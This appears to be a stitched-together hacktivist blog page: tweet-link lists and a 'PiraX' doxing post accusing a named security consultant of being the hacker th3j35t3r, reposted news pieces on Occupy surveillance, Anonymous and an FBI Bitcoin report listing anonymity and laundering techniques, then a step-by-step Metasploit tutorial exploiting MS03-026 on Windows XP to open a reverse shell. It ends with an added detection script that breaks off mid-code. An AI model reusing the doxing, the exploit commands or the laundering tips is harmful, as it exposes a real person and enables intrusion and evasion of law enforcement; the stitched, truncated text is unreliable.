https://twitter.com/#!/TomRyanBlog/status/174132025215811585

J ‘Stay frosty’:

https://twitter.com/#!/th3j35t3r/status/186923663734489088

https://twitter.com/#!/th3j35t3r/status/134434056925483008

https://twitter.com/#!/th3j35t3r/status/129246959021203456

https://twitter.com/#!/th3j35t3r/status/128849629939892224

https://twitter.com/#!/th3j35t3r/status/81862725638160385

https://twitter.com/#!/th3j35t3r/status/76373640832225282

TR ‘Stay frosty’:

https://twitter.com/#!/TomRyanBlog/status/189679107347460097

https://twitter.com/#!/TomRyanBlog/status/180689040385900544

https://twitter.com/#!/TomRyanBlog/status/179655809280655361

https://twitter.com/#!/TomRyanBlog/status/179298552680415232

https://twitter.com/#!/TomRyanBlog/status/178571536691765249

https://twitter.com/#!/TomRyanBlog/status/178529239052730368

https://twitter.com/#!/TomRyanBlog/status/178336251240382464

https://twitter.com/#!/TomRyanBlog/status/179622057305317376

https://twitter.com/#!/TomRyanBlog/status/179802508372344832

J likes to wink:

https://twitter.com/#!/th3j35t3r/status/184373769958211584

https://twitter.com/#!/th3j35t3r/status/120271829377097728

https://twitter.com/#!/th3j35t3r/status/76373640832225282

https://twitter.com/#!/th3j35t3r/status/185019516793786370

https://twitter.com/#!/th3j35t3r/status/81477469135319040

https://twitter.com/#!/th3j35t3r/status/178878010961833986

TR likes to wink:

https://twitter.com/#!/TomRyanBlog/status/187885131976024064

https://twitter.com/#!/TomRyanBlog/status/187372927946211328

https://twitter.com/#!/TomRyanBlog/status/179932280809197568

https://twitter.com/#!/TomRyanBlog/status/180689040385900544

https://twitter.com/#!/TomRyanBlog/status/189679107347460097

https://twitter.com/#!/TomRyanBlog/status/169492746871119873

https://twitter.com/#!/TomRyanBlog/status/179655809280655361

https://twitter.com/#!/TomRyanBlog/status/179802508372344832

https://twitter.com/#!/TomRyanBlog/status/179669923163938816

https://twitter.com/#!/TomRyanBlog/status/187914228810784769

J ‘much?’:

https://twitter.com/#!/th3j35t3r/status/82200919365787648

https://twitter.com/#!/th3j35t3r/status/81871769832665088

If ya can’t beat em, make some shit up??? LMAO!

TR ‘much?’:

https://twitter.com/#!/TomRyanBlog/status/179927195022659584

J ‘…’:

https://twitter.com/#!/th3j35t3r/status/189139338796351492

https://twitter.com/#!/th3j35t3r/status/186958030791905282

https://twitter.com/#!/th3j35t3r/status/186749312166932483

https://twitter.com/#!/th3j35t3r/status/128849629939892224

https://twitter.com/#!/th3j35t3r/status/138951576789331968

https://twitter.com/#!/th3j35t3r/status/168769540598145025

https://twitter.com/#!/th3j35t3r/status/179233292682407937

https://twitter.com/#!/th3j35t3r/status/184321677092597760

TR ‘…’:

https://twitter.com/#!/TomRyanBlog/status/188088227704487936

https://twitter.com/#!/TomRyanBlog/status/187342615648272384

https://twitter.com/#!/TomRyanBlog/status/188829946439929856

https://twitter.com/#!/TomRyanBlog/status/189449964219400194

https://twitter.com/#!/providesecurity/status/187253830315016192

https://twitter.com/#!/TomRyanBlog/status/189757038778269696

https://twitter.com/#!/Render64/status/187912159655772161

J ‘<<arrows>>’:

https://twitter.com/#!/th3j35t3r/status/189463655811780609

https://twitter.com/#!/th3j35t3r/status/185019516793786370

TR ‘<<arrows>>’:

https://twitter.com/#!/TomRyanBlog/status/179683104972210176

https://twitter.com/#!/TomRyanBlog/status/188096685250068480

https://twitter.com/#!/TomRyanBlog/status/177907983227949056

https://twitter.com/#!/TomRyanBlog/status/178555495806803968

https://twitter.com/#!/TomRyanBlog/status/179321093897723904

J using UPPER case:

https://twitter.com/#!/th3j35t3r/status/189165520556277761

https://twitter.com/#!/th3j35t3r/status/178895612723478531

https://twitter.com/#!/th3j35t3r/status/181438361511280640

https://twitter.com/#!/th3j35t3r/status/82538803188862976

https://twitter.com/#!/th3j35t3r/status/98386681836736512

https://twitter.com/#!/th3j35t3r/status/177544329458491392

https://twitter.com/#!/th3j35t3r/status/135438221483048960

https://twitter.com/#!/th3j35t3r/status/177568887334903808

https://twitter.com/#!/th3j35t3r/status/110676313366462464

https://twitter.com/#!/th3j35t3r/status/127396730621788160

https://twitter.com/#!/th3j35t3r/status/100282273072549890

https://twitter.com/#!/th3j35t3r/status/178566407909412866

https://twitter.com/#!/th3j35t3r/status/132173511874711552

https://twitter.com/#!/th3j35t3r/status/94485325744848896

https://twitter.com/#!/th3j35t3r/status/97333572955947008

https://twitter.com/#!/th3j35t3r/status/91970882095943680

https://twitter.com/#!/th3j35t3r/status/141002481260961792

TR using UPPER case:

https://twitter.com/#!/TomRyanBlog/status/187908914417893379

https://twitter.com/#!/TomRyanBlog/status/188461215348031489

https://twitter.com/#!/TomRyanBlog/status/187018163567853568

https://twitter.com/#!/TomRyanBlog/status/185423913197637633

https://twitter.com/#!/TomRyanBlog/status/187240901574266881

https://twitter.com/#!/TomRyanBlog/status/180380942614016001

https://twitter.com/#!/TomRyanBlog/status/187903623693467648

https://twitter.com/#!/TomRyanBlog/status/187361681452699649

https://twitter.com/#!/TomRyanBlog/status/187541167972417536

https://twitter.com/#!/TomRyanBlog/status/187322975383588864

https://twitter.com/#!/TomRyanBlog/status/187309018623127552

https://twitter.com/#!/TomRyanBlog/status/187558445036216320

https://twitter.com/#!/TomRyanBlog/status/187541167972417536

https://twitter.com/#!/TomRyanBlog/status/187656738818899968

https://twitter.com/#!/TomRyanBlog/status/187261297669308416

https://twitter.com/#!/TomRyanBlog/status/187530160134828032

https://twitter.com/#!/TomRyanBlog/status/184620737821286402

Jester ‘LMAO!’:

https://twitter.com/#!/th3j35t3r/status/105305979733815296

TR ‘ROFLMAO!’:

https://twitter.com/#!/TomRyanBlog/status/180709354624925696

https://twitter.com/#!/TomRyanBlog/status/179773457943371776

https://twitter.com/#!/TomRyanBlog/status/187709243087003650

https://twitter.com/#!/TomRyanBlog/status/186965988082843648

https://twitter.com/#!/TomRyanBlog/status/187272732147322880

https://twitter.com/#!/TomRyanBlog/status/187583747154132992

J struggles with apostrophes:

https://twitter.com/#!/th3j35t3r/status/83239272504770560

https://twitter.com/#!/th3j35t3r/status/177080046597578752

https://twitter.com/#!/th3j35t3r/status/186749312166932483

(See his blog for heaps more examples.)

http://www.youtube.com/watch?v=WeO44IWlkfU (Skip to 5:07); ‘lets’, ‘its’ and ‘Thats’ should all have apostrophes.

http://www.youtube.com/watch?v=yJTvzErKHWE Look at the Notepad he’s typing into: ‘lets’ should have an apostrophe and ‘peak’ should have two ‘e’s in it. Skip to 2:20: the text on Jester’s self-designed Xerxes machine also contains typos: ‘SUCCESFULLY’ should have two ‘s’ in the middle. At 2:29, you’ll see that ‘Secured’ has also been spelt wrongly. At 6:52 he also types the same misspelt word into Notepad.

TR also struggles with apostrophes:

https://twitter.com/#!/TomRyanBlog/status/187920367845781504

https://twitter.com/#!/TomRyanBlog/status/187710784690855936

https://twitter.com/#!/TomRyanBlog/status/180432605680902144

https://twitter.com/#!/TomRyanBlog/status/187645320442822656

https://twitter.com/#!/TomRyanBlog/status/187531807598714880

https://twitter.com/#!/TomRyanBlog/status/187917710498336769

https://twitter.com/#!/TomRyanBlog/status/185737304290234368

https://twitter.com/#!/TomRyanBlog/status/178485680899502081

J tweets ‘TANGO DOWN’:

https://twitter.com/#!/th3j35t3r/status/175040242477318144

https://twitter.com/#!/th3j35t3r/status/175029005718794240

TR tweets ‘TANGO DOWN’:

https://twitter.com/#!/TomRyanBlog/status/186482996352778240

https://twitter.com/#!/TomRyanBlog/status/186482690797744128

J always writes numbers numerically:

https://twitter.com/#!/th3j35t3r/status/174540542724669441

https://twitter.com/#!/th3j35t3r/status/93771304607563776

https://twitter.com/#!/th3j35t3r/status/114830590452310016

https://twitter.com/#!/th3j35t3r/status/134434056925483008

https://twitter.com/#!/th3j35t3r/status/140925221090758656

https://twitter.com/#!/TomRyanBlog/status/185576329712910336

TRB always writes numbers numerically:

https://twitter.com/#!/TomRyanBlog/status/187211721365139456

https://twitter.com/#!/TomRyanBlog/status/187712594373648384

https://twitter.com/#!/TomRyanBlog/status/178965908696481793

https://twitter.com/#!/TomRyanBlog/status/187680293984022529

https://twitter.com/#!/TomRyanBlog/status/187539614876176384

Compare TR and J’s tweet patterns, in particular the time of day they tweet at and the hashtags they use: http://tweetstats.com (Open two separate windows and enter their Twitter names).

J using #Fail:

https://twitter.com/#!/th3j35t3r/status/132152349639720960

https://twitter.com/#!/th3j35t3r/status/103200916156588032

https://twitter.com/#!/th3j35t3r/status/102784136015646722

https://twitter.com/#!/th3j35t3r/status/97030633330716674

https://twitter.com/#!/th3j35t3r/status/178966110694150144

J using #Fail:

https://twitter.com/#!/TomRyanBlog/status/187708057344671744

https://twitter.com/#!/TomRyanBlog/status/167697098047889411

https://twitter.com/#!/TomRyanBlog/status/177978089203175424

https://twitter.com/#!/TomRyanBlog/status/178269119316107264

https://twitter.com/#!/TomRyanBlog/status/186927307544477697

https://twitter.com/#!/TomRyanBlog/status/178573080438898689

https://twitter.com/#!/TomRyanBlog/status/178982123959619585

https://twitter.com/#!/TomRyanBlog/status/185189598677319680

https://twitter.com/#!/TomRyanBlog/status/186930868273676288

https://twitter.com/#!/TomRyanBlog/status/186965988082843648

J using #Justsayin:

https://twitter.com/#!/th3j35t3r/status/76373640832225282

TRB using #Justsayin:

https://twitter.com/#!/TomRyanBlog/status/177907983227949056

https://twitter.com/#!/TomRyanBlog/status/179578215411630080

https://twitter.com/#!/TomRyanBlog/status/178518183525888000

https://twitter.com/#!/TomRyanBlog/status/184620737821286402

https://twitter.com/#!/TomRyanBlog/status/184270112361168898

_________________________________________________________________________

PIRAX DOXING CONTINUED…  (The ‘smedley manning’ debacle)
You took this DOX’ing really well, to be honest. You shook it off as a mere fancification numerous times, and continued forward head-strong, apparently unmoved by those watching from the outside. But you knew deep-down that you had to eradicate this DOX from the minds of the enemies you have procured over the years. You know that a lot of people would like to see you gone. So, you came up with a plan.

The plan went something like this:
On May 10th, you registered the Twitter account @cubespherical and labeled it as “Smedley Manning”, as an obvious satirical homage to the now imprisoned Bradley Manning, a REAL soldier who fought for truth. You then exchanged a few messages with @th3j35t3r to make it look like a legitimate conversation, and began to “leak” information about yourself. We both know that this information is false, and was only created to distract others from the real DOX, located above. We know you are somewhat intelligent. However, there will always be those who will outsmart you. Consider yourself outsmarted.

Here is the analysis, broken down:
After you took down both your Twitter and WordPress blog, the mainstream blogosphere was certain you had finally been figured out. They assumed this was your acknowledgement of your own defeat and were positive you had been successfully DOX’d by @cubespherical. You were finally giving up. You knew they would react this way… It was all a part of your master plan. But, in reality, you ARE @cubespherical. Yes, @th3j35t3r and @cubespherical are the same person. Nicely done, Tom. You fooled almost everyone. But, like all good things (“good” meaning something along the lines of “idiotic” in this case), you must come to an end.

So how can we justify this claim? Where is our proof? Simple: You gave us everything.

Red-Flag #1: You have been a pretty regular user of Twitter until very recently, after the above DOX was published.

Red-Flag #2: An entirely new DOX is now being teased, even while the above DOX is as sure-fire as they come. Who would believe that a DOX coming from @cubespherical, an entirely new one at that, would be legitimate?

Red-Flag #3: You sat idle on Twitter while @cubespherical AKA Smedley Manning openly talked shit about you, only responding once things became heated on InfoSecIsland. This will take some psychological investigation, but it is damning nonetheless. Your article here is the most revealing bit of all:

http://www.infosecisland.com/blogview/21348-Not-Totally-Sure-What-Just-Happened.html

You started off with the following line, paraphrased: “I thought Smedley was my friend at first [you used the word ‘supporter’] hurr durr, but he then started threatening me hurr durr.” That doesn’t even sound realistic. But it *is* a subtle way to garner sympathy. I applaud you for your effort.

Red-Flag #4: Next up is your subtle jab at Anonymous. You changed @cubespherical’s avatar to a picture of a Guy Fawkes mask and deleted the Bitcoin address in exchange for the “We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.” motto.

In your article, you say “Even if this was a common troll, he just demonstrated that any fool can speak for and ‘as’ Anonymous.”

It is clear that you did this for one reason: to throw spears at Anonymous while appearing to be a victim of cyber-bullying on a much grander scale.

Red-Flag #5: You are subconsciously promoting @cubespherical’s efforts for Bitcoin donations.
While appearing to mock @cubespherical, while still somehow conveying him as a threat, you still manage to forget to *NOT* post his Bitcoin address. Our thoughts: You WANT @cubespherical to make some money off of some Bitcoin donations. You yourself use Bitcoin pretty regularly and accept it for donations on your blog. How do we know you aren’t just promoting @cubespherical’s Bitcoin address so that YOU can profit? Here are your words, directly lifted from your blog post:

“So here’s the throwdown. ‘Smeddles’ drop my dox. Do it. You have proved and shown nothing. Only that you are completely failing. You have no bitcoins donated, you have shown 2 things to me, Anonymous have too many chiefs and not enough indians, and that your numbers, at least 9000 allegedly, combined have  0.00000001 bitcoins between them. Here is what you have so far. lol.

https://blockexplorer.com/address/15JDgkwFVXvuxCt66eUQ434ty3jrvwPfGe

Either that or they were clever enough to realize you were full of it from the get go. As I have demonstrated and stated many times before, I will never ask the public for any money.”

WHY WOULD YOU EVEN NEED TO REMIND PEOPLE THAT YOU DON’T ASK FOR DONATIONS IF THIS ISN’T EVEN YOUR BITCOIN ADDRESS? Simple. Because it actually is.

It is also worth noting that both Smedley Manning and th3j35t3r favor Ubuntu 11.xx releases. They like using GNOME, too:
http://3.bp.blogspot.com/-9LpW_-t2lkU/TpmnnnPHn6I/AAAAAAAABMA/AKBOIZUm4sM/s1600/Opera-Next-Ubuntu-Oneric.png
http://4.bp.blogspot.com/_FJH0hYZmVtc/TF59PLnLUJI/AAAAAAAAJNE/IoVU8sTFyUo/s1600/Opera+Mobile+for+Linux+(1440×797)_023.png

To conclude this talk, Tom, we would like to take this privilege to give to you a formal FUCK YOU. You have been DOX’d and your master plan to avoid the inevitable by creating a new nemesis and a new DOX while asking fools to send you money for this bogus DOX has been foiled. You are over. No one cares about the small sites you take down with your shitty XerXes tool and everyone knows you didn’t actually DDoS WikiLeaks, or even have the ability to do so. You are a fame-whoring idiot that has finally been pulled so low, you serve no purpose for ever standing up again. Goodbye.

XOXO,
PiraX <3

@TheRealPiraX
http://pirax.de
Donate Bitcoin: 17gMaYgUsx7dj532s3ezXmfMrVhJ1BfRC1
We would also like to give a shout-out to our home on VoxAnon IRC. Much love to #voxanon

_________________________________________________________________________

 

BUT THAT’S NOT IT – DON’T FORGET THIS LITTLE GEM…

 

Thomas Ryan: The Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

The Occupy Wall Street protests have been going on for a month. And it seems the FBI and NYPD have had help tracking protesters’ moves thanks to a conservative computer security expert who gained access to one of the group’s internal mailing lists, and then handed over information on the group’s plans to authorities and corporations targeted by protesters.

Since the Occupy Wall Street protest began on September 17, New York security consultant Thomas Ryan has been waging a campaign to infiltrate and discredit the movement. Ryan says he’s done contract work for the U.S. Army and he brags on his blog that he leads “a team called Black Cell, a team of the most-highly trained and capable physical, threat and cyber security professionals in the world.” But over the past few weeks, he and his computer security buddies have been spending time covertly attending Occupy Wall Street meetings, monitoring organizers’ social media accounts, and hanging out with protesters in Lower Manhattan.

As part of their intelligence-gathering operation, the group gained access to a listserv used by Occupy Wall Street organizers called September17discuss. On September17discuss, organizers hash out tactics and plan events, conduct post-mortems of media appearances, and trade the latest protest gossip. On Friday, Ryan leaked thousands of September17discuss emails to conservative blogger Andrew Breitbart, who is now using them to try to smear Occupy Wall Street as an anarchist conspiracy to disrupt global markets.

What may be much more alarming to Occupy Wall Street organizers is that while Ryan was monitoring September17discuss, he was forwarding interesting email threads to contacts at the NYPD and FBI, including special agent Jordan T. Loyd, a member of the FBI’s New York-based cyber security team.

 

Oh, and what do real PATRIOT VETERANS think … ?


VETERAN: We didn’t “serve our country”; We serve the interests of Capital

“I’ve seen a ton on the facebooks about “thanking veterans for their service.” As a veteran let me just be very straightforward and honest with you. We didn’t “serve our country”; we don’t actually serve our brothers/sisters or our neighbors. We serve the interests of Capital. We never risked our lives or spent months on deployment away from our family and friends so they can have this abstract concept called “freedom”. We served big oil; big coal; Coca-Cola; Kellogg, Brown, and Root and all the other big Capital interests who don’t know a fucking thing about sacrifice. These people will never have to deal with the loss of a loved one or the physical and/or psychological scars that those who “serve”, and their families, have to deal with for the rest of their lives. The most patriotic thing someone can do is to tell truth to power and dedicate yourself to building power to overthrow these sociopathic assholes. I served with some of the most real and genuine people I’ve ever met. You’ll never see solidarity like the kind of solidarity you experience when your life depends on the person next to you. But most of us didn’t join for that; we joined because we were fucking poor and didn’t have many other options.”       -Anonymous

 

IN CONCLUSION:  An obvious desperate grab to stay relevant – Does anyone care?

 

ANSWER: jester who?  Now back to projects that create positive change in the world, instead of discussing individuals who support & enable the Military Industrial Complex of death, destruction, and global enslavement of Humanity.

 

OH AND FOR THOSE WHO FORGOT, A REMINDER:

cia-owns-al-qaeda

 

An (inadvertent) FBI Guide to Keeping Your #Bitcoin Transactions Below the Radar


>>> FBI BITCOIN REPORT – APRIL 2012 <<<<

The FBI sees the anonymous Bitcoin payment network as an alarming haven for money laundering and other criminal activity — including as a tool for hackers to rip off fellow Bitcoin users.

That’s according to a new FBI internal report that leaked to the internet this week, which expresses concern about the difficulty of tracking the identity of anonymous Bitcoin users, while also unintentionally providing tips for Bitcoin users to remain more anonymous.

The report titled “Bitcoin Virtual Currency: Unique Features Present Distinct Challenges for Deterring Illicit Activity,” (.pdf) was published April 24 and is marked For Official Use Only (not actually classified), but was leaked to the internet on Wednesday.

In the document, the FBI notes that because Bitcoin combines cryptography and a peer-to-peer architecture to avoid a central authority, contrary to how digital currencies such as eGold and WebMoney operated, law enforcement agencies have more difficulty identifying suspicious users and obtaining transaction records.

Though the Bureau expresses confidence that authorities can still snag some suspects who use third-party Bitcoin services that require customers to submit valid identification or banking information in order to convert their bitcoins into real-world currencies, it notes that using offshore services that don’t require valid IDs can thwart tracking by law enforcement.

Bitcoin is an online currency that allows buyers and sellers to exchange money anonymously. To “cash out,” the recipient has to convert the digital cash into U.S. dollars, British pounds or another established currency. Bitcoin is used as a legitimate form of payment by numerous online retailers selling traditional consumer goods, such as clothing and music. But it’s also used by underground sites, such as Silk Road, for the sale of illegal narcotics.

To generate bitcoins, users have to download and install a free Bitcoin software client to their computers. The software generates Bitcoin addresses or accounts — a unique 36-character string of numbers and letters — to receive Bitcoin payments. The currency is stored on the user’s computer in a virtual “wallet.” Users can create as many addresses or accounts as they want.

To send bitcoins, the sender enters the recipient’s address as well as the number of bitcoins she wants to transfer to the address. The sender’s computer digitally signs the transaction and sends the information to the peer-to-peer Bitcoin network, which validates the transaction in a matter of minutes and releases the coins for the receiver to spend or convert.

The conversion value fluctuates with supply and demand and the trust in the currency. As of last month, there were more than 8.8 million bitcoins in circulation, according to Bitcoin, with a value of about $4 to $5 per bitcoin. The FBI estimates in its report that the Bitcoin economy was worth between $35 million and $44 million.

It’s easy to see the attraction for criminals.

“If Bitcoin stabilizes and grows in popularity, it will become an increasingly useful tool for various illegal activities beyond the cyber realm,” the FBI writes in the report. “For instance, child pornography and Internet gambling are illegal activities already taking place on the Internet which require simple payment transfers. Bitcoin might logically attract money launderers, human traffickers, terrorists, and other criminals who avoid traditional financial systems by using the Internet to conduct global monetary transfers.”

Bitcoin transactions are published online, but the only information that identifies a Bitcoin user is a Bitcoin address, making the transaction anonymous. Or at least somewhat anonymous. As the FBI points out in its report, the anonymity depends on the actions of the user.

Since the IP address of the user is published online with bitcoin transactions, a user who doesn’t use a proxy to anonymize his or her IP address is at risk of being identified by authorities who are able to trace the address to a physical location or specific user.

And a report published by researchers in Ireland last year showed how, by analyzing publicly available Bitcoin information, such as transaction records and user postings of public-private keys, and combining that with less public information that might be available to law enforcement agencies, such as bank account information or shipping addresses, the real identity of users might be ascertained.

But the FBI helpfully lists several ways that Bitcoin users can protect their anonymity.

  • Create and use a new Bitcoin address for each incoming payment.
  • Route all Bitcoin traffic through an anonymizer.
  • Combine the balance of old Bitcoin addresses into a new address to make new payments.
  • Use a specialized money-laundering service.
  • Use a third-party eWallet service to consolidate addresses. Some third-party services offer the option of creating an eWallet that allows users to consolidate many bitcoin addresses and store and easily access their bitcoins from any device.
  • Individuals can create Bitcoin clients to seamlessly increase anonymity (such as allowing users to choose which Bitcoin addresses to make payments from), making it easier for non-technically savvy users to anonymize their Bitcoin transactions.

But the bigger risk for crooks and others who use bitcoin might not come from law enforcement identifying them, but from hackers who are out to rob their virtual Bitcoin wallets dry.

There have been several cases of hackers using malware to steal the currency in the virtual wallet stored on a user’s machine.

Last year, computer security researchers discovered malware called “Infostealer.Coinbit” that was designed specifically to steal bitcoins from virtual Bitcoin wallets and transfer them to a server in Poland.

One Bitcoin user complained in a Bitcoin forum that 25,000 bitcoins had been stolen from an unencrypted Bitcoin wallet on his computer. Since the exchange rate for bitcoins at the time was about $20 per bitcoin, the value of his loss at the time was about $500,000. A popular web hosting company called Linode was also infiltrated by an attacker looking to pilfer bitcoins.

And there have also been cases of hackers attempting to use “botnets” to generate bitcoins on compromised machines.

According to the FBI, quoting an anonymous “reliable source,” last May someone compromised a cluster of machines at an unidentified Midwestern university in an attempt to manufacture bitcoins. The report doesn’t provide any additional details about the incident.

http://www.wired.com/threatlevel/2012/05/fbi-fears-bitcoin/

 

Is Anonymous The Internet’s Most Powerful Mirage?


You may have noticed it last week. Anonymous claimed the scalp of yet another major government agency.

Supporters of the online movement of activists and internet trolls said they’d stolen 1.7 GB of data from an agency within the Department of Justice that aggregates crime data. They claimed to have nabbed “lots of shiny things such as internal emails and the entire database dump.” They branded the heist as “Monday Mail Mayhem” and said it could help people “know the corruption in their government.” They posted it on Pirate Bay as a torrent, for anyone to see — and 1.7 GB was just the size of the zipped file.

Not many people bothered to check what was actually in the huge file.

Step in Identity Finder, a software security firm.  Privacy officer Aaron Titus downloaded the payload last week and sifted through it all, checking out the veracity of the claims by Anonymous.

Turned out they were overhyped.

The zipped file contained 6.5 GB of web server files and “does not appear to contain any sensitive personal information, internal documents, or internal emails,” according to Titus. A folder named “Mail” was mostly empty, though it contained two administrative email addresses. There were also no personal details (social security numbers or credit card numbers), and the worst the breach had done was reveal the site’s web server file, which could be leveraged by other hackers for future attacks.

It looked like the breach had done more to grab attention from the media and the Department of Justice than do any real damage.

Surprised? You shouldn’t be. This was another illustration of the power of Anonymous as a continuing online insurgency: not in hacking per se, but its constant ability to grab eyeballs, project power, and give followers a voice and sense of purpose unlike any they’ve experienced before. What’s important for companies and policy makers (the typical targets) to note is that it’s oftentimes more a tease than anything else.

Other examples:

1) Earlier this month Fox News reported that an online group called TheWikiBoat, aligned with Anonymous, planned to bring down the websites of 46 major companies on Friday May 25. TheWikiBoat said in a public statement that it had “no motives other then [sic] doing it for the lulz,” (i.e. for shits and giggles). The FBI’s Cyber Division was concerned enough to send an email to the likes of Apple Computer, McDonald’s and ExxonMobil warning them of a potential attack — which didn’t happen.

2) Around this time last year, a single supporter of Anonymous managed to grab global headlines when he tweeted that he had a cache of Bank of America emails. What he eventually released was an e-mail exchange between himself and a BofA ex-staffer who made (what admittedly looked like valid) complaints about the bank’s management. But it did nothing to the bank’s stock price, and the news agenda quickly moved on.

3) In December 2010 Anonymous claimed responsibility for taking down the websites of PayPal, MasterCard and Visa after these firms nixed online donations to WikiLeaks. How? Supporters implied it was thanks to thousands of volunteers who had become part of a cyber army by downloading a software tool called LOIC. What really happened: a couple of supporters with botnets temporarily took the sites down — but the notion that Anonymous was an international “army” of hacktivists was left floating around the Internet.

Time and again, online supporters have laid claim to the brand power of Anonymous, invoking its name, imagery such as the Guy Fawkes logo and headless, suited man surrounded by olive leaves, along with the tag line, “We are Anonymous… Expect us.” The result: news outlets and policy makers sit up and listen, more so than they would if those supporters used their real names, or were literally anonymous. The power of Anonymous is propagated by the continued use of a name wrapped in hype and disinformation, more than the occasional real hacks.

The Anonymous “brand” gets street cred from cyber attacks carried out by a minority of hackers who know how to use SQL injection techniques or who know people who control botnets. The additional hype comes from the impassioned, sometimes-threatening rhetoric of less-skilled-but-enthusiastic followers on Twitter or the imageboard 4chan.

Why do these supporters join in? Everyone has their own reasons — something to do, the engaging community of people to talk to, the thrill of being part of a secret crowd. Sources in Anonymous that I have spoken to over the last year often speak to a sense of purpose they get from Anonymous, and sometimes the justification to do the subversive, often-illegal things online that they would not otherwise do. It’s mob mentality with a twist — the activist element of protest, twinned with the culture of trolling and exaggeration that runs through image boards like 4chan.

For law enforcement, who happen to chase anarchists with particular zeal in the United States, there isn’t so much a criminal organization to rope in as the mirage of one. No system with leaders and rules, but a culture and etiquette that is changing all the time. Many of the figureheads who organized the Anonymous attacks against Scientology in 2008 have left the community to focus on college or full-time jobs, many happy to break away from the frenetic pace of operations and the constant paranoia about getting doxxed. Those who’ve been arrested are upheld as martyrs within the network, and there are many more who are joining, and who think they can do a better job of hiding from the police.

Anonymous will continue to exist for some time, taking new followers, changing tactics, and often staying one spontaneously-placed step ahead of the police. They’ll fight for the right to their anonymity, to expose other people’s information, or anything they want, and they’ll come and go from the headlines. But these chaotic actors will stick around, and their greatest power will continue to be not their skills or abilities, but the very name that they can invoke.

For more details on how Anonymous works and the real, human stories behind it, check out my forthcoming book, “We Are Anonymous: Inside the Hacker World Of LulzSec, Anonymous and the Global Cyber Insurgency.”

Or follow me on Twitter: @parmy

SOURCE: http://www.forbes.com/sites/parmyolson/2012/05/30/is-anonymous-the-internets-most-powerful-mirage/

Hack Like a Pro: How to Exploit and Gain Remote Access to PCs Running Windows XP


In my first installment in this series on professional hacking tools, we downloaded and installed Metasploit, the exploitation framework. Now, we will begin to explore the Metasploit Framework and initiate a tried and true hack.

Before we start hacking, let’s familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we’ll try to make it understandable so that we can execute our first exploit.

Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.

  • Exploit

Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you’ve probably already heard of are SQL injections, buffer overflows, etc.

  • Payload

A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.

  • Shellcode

This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It’s called “shellcode” because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim’s machine.

  • Module

A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.

  • Listener

This is the component that listens for the connection from the hacker’s system to the target system. The listener simply handles the connection between these systems.

  • Show

Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.

Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!

Step 1 Getting Started

First, open a terminal in Linux.

One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

 

Open the Metasploit console.

msfconsole

Be patient; it takes a while for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.

Step 2 Find the Exploit

Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:

msf > search dcom

 

Step 3 Set the Exploit

Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.

msf > use exploit/windows/dcerpc/ms03_026_dcom

 

Note that the prompt has changed and now reflects our chosen exploit.

Step 4 Set the Options

Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.

msf > show options

 

Step 5 Set Remote Host

Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.

msf > set RHOST 10.0.0.3

Step 6 Show Payloads

Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:

msf > show payloads

 

Step 7 Set Payload

Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.

msf > set PAYLOAD  generic/shell_reverse_tcp

 

Step 8 Set Local Host

Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such as nmap can help you obtain IP addresses.

msf > set LHOST 10.0.0.6

 

Step 9 Exploit

Now we command Metasploit to exploit the system:

msf > exploit

Step 10 Open a Shell on the Hacked System

Type the command –I 1 to open a command shell on the XP system that will appear on your Metasploit console.

–I 1

To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!

C: >dir

Congratulations! You have just hacked your first system using Metasploit!

In my upcoming lessons, we will look at hacking Linux systems and introduce you to the powerful Meterpreter, Metasploit’s proprietary payload.
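
A defender's view of Steps 5 through 9, as an added example that is not part of the original tutorial: the exploit reaches the target on TCP port 135 and the reverse-shell payload makes the target connect back to the other machine, so an inbound RPC connection followed shortly by an outbound connection to the same peer is worth alerting on. The log format, the 60-second window, the callback port and all function names are assumptions; the log lines are constructed and reuse the tutorial's 10.0.0.3 and 10.0.0.6.

```python
import re
from collections import namedtuple
from datetime import datetime, timedelta

RPC_PORT = 135  # port the tutorial says the exploit connects to on the target

# Constructed sample flow log. The line format is an assumption made for this
# example and does not match any particular firewall or sensor product.
SAMPLE_LOG = """\
2012-04-20T10:14:40 TCP 10.0.0.10:50211 -> 10.0.0.3:135
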